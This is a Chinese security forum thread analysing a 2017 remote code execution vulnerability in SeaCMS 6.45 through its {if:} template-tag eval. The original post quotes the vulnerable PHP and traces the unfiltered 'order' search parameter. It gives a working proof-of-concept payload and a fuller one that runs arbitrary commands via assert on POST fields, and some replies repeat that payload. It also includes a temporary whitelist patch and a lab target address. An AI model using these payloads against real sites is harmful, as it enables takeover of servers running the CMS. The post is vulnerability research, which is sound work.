[漏洞分析] 海洋cms最新版前台getshell(附靶机)

[复制链接]
查看20355 | 回复7 | 2017-4-24 18:45:51 | 显示全部楼层 |阅读模式
cms版本:6.45官网好像是6.48版本了靶机地址:http://seacms.test.bugku.com/
直接上代码[mw_shl_code=applescript,true]function parseIf($content){
                if (strpos($content,'{if:')=== false){
                return $content;
                }else{
                $labelRule = buildregx("{if.*?)}(.*?){end if}","is");
                $labelRule2="{elseif";
                $labelRule3="{else}";
                preg_match_all($labelRule,$content,$iar);
                $arlen=count($iar[0]);
                $elseIfFlag=false;
                for($m=0;$m<$arlen;$m++){
                        $strIf=$iar[1][$m];
                        $strIf=$this->parseStrIf($strIf);
                        $strThen=$iar[2][$m];
                        $strThen=$this->parseSubIf($strThen);
                        if (strpos($strThen,$labelRule2)===false){
                                if (strpos($strThen,$labelRule3)>=0){
                                        $elsearray=explode($labelRule3,$strThen);
                                        $strThen1=$elsearray[0];
                                        $strElse1=$elsearray[1];
                                        @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
                                        if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
                                }else{
                                @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
                                if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
                        }else{
                                $elseIfArray=explode($labelRule2,$strThen);
                                $elseIfArrayLen=count($elseIfArray);
                                $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
                                $resultStr=$elseIfSubArray[1];
                                $elseIfArraystr0=addslashes($elseIfArray[0]);
                                @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
                                for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
                                        $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
                                        $strElseIf=$this->parseStrIf($strElseIf);
                                        $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
                                        @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
                                        @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
                                        if ($elseIfFlag) {break;}
                                }
                                $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
                                $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
                                if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
                                @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
                                $content=str_replace($iar[0][$m],$resultStr,$content);
                        }
                }
                return $content;
                }
        }[/mw_shl_code]
上面主要逻辑为解析html文件中的{if:}{end if}标签代码,可以看到没有做任何处理就eval,那么我们查找一下对应调用的地方会不会有漏洞。
主要关注前台,找到一处解析搜索结果的页面(search.php),代码比较多,一点一点来看。
找到调用的位置line 212
[mw_shl_code=applescript,true]$content=$mainClassObj->parseIf($content);
[/mw_shl_code]
往上看,发现他的逻辑是先解析其他类型的标签,比如
[mw_shl_code=applescript,true]{searchpage:page}[/mw_shl_code]
那么接下来的思路,主要是2点,查找对应if标签可控的位置,另一种就是查找其他标签的可控内容,写入if标签
我找到一处其他标签可控且没有做任何处理的位置,直接写入if标签语句即可造成任意代码执行
[mw_shl_code=applescript,true]function echoSearchPage()
{
        global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;
        $order = !empty($order)?$order:time;
...
...
...
$content = str_replace("{searchpage:page}",$page,$content);
        $content = str_replace("{seacms:searchword}",$searchword,$content);
        $content = str_replace("{seacms:searchnum}",$TotalResult,$content);
        $content = str_replace("{searchpagerdername}",$order,$content);
...
...
...[/mw_shl_code]
order变量可控并且在调用parseIf函数前先解析,所以我们可以通过order写入if标签。
查看一下具体html代码
[mw_shl_code=applescript,true]<div class="btn-toolbar" role="toolbar">
    <div class="btn-group">
      <a href="{searchpagerder-time-link}" {if:"{searchpagerdername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>
      <a href="{searchpagerder-hit-link}" {if:"{searchpagerdername}"=="hit"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderaddtime">最近热播</a>
      <a href="{searchpagerder-score-link}" {if:"{searchpagerdername}"=="score"} class="btn btn-success" {else} class="btn btn-default" {end if} id="ordergold">评分最高</a>
    </div>
  </div>[/mw_shl_code]
那么接下来就可以构造poc了,类似sql注入,我们先把前面的if标签语句闭合,写入恶意代码并闭合后面的if标签。
example:
[mw_shl_code=applescript,true]}{end if}{if:1)phpinfo();if(1}{end if}
[/mw_shl_code]
从靶机来验证一下:
1.png
看到有人问怎么深度利用,这里给出一种tips
[mw_shl_code=applescript,true]searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();[/mw_shl_code]
临时解决方案:
64行加:
[mw_shl_code=applescript,true]$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";[/mw_shl_code]




有人的地方就有江湖。
回复

使用道具 举报

匿名 kira | 2017-4-26 13:36:26 | 显示全部楼层
靶机打不开
回复

使用道具 举报

Harry | 2017-4-26 21:02:26 | 显示全部楼层

120.24.86.145
有人的地方就有江湖。
回复

使用道具 举报

Harry | 2017-4-26 21:13:51 | 显示全部楼层

绑定hosts
有人的地方就有江湖。
回复

使用道具 举报

tomyxy | 2017-6-1 10:18:59 | 显示全部楼层
poc里面的括号是根据哪里构造的啊?
回复

使用道具 举报

Be_easy | 2017-12-11 16:00:47 | 显示全部楼层
实验机挂掉了??这个poc不好用呀
回复

使用道具 举报

Harry | 2017-12-11 20:41:22 | 显示全部楼层
Be_easy 发表于 2017-12-11 08:00
实验机挂掉了??这个poc不好用呀

http://120.24.86.145:8008
有人的地方就有江湖。
回复

使用道具 举报

Be_easy | 2017-12-11 20:56:51 | 显示全部楼层
Harry 发表于 2017-12-11 20:41
http://120.24.86.145:8008

哥们,复现不了呀,这个poc   http://120.24.86.145:8008/   searchword=d
&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}
&func=assert
&cmd=phpinfo();
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

93

主题

224

帖子

3164

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3164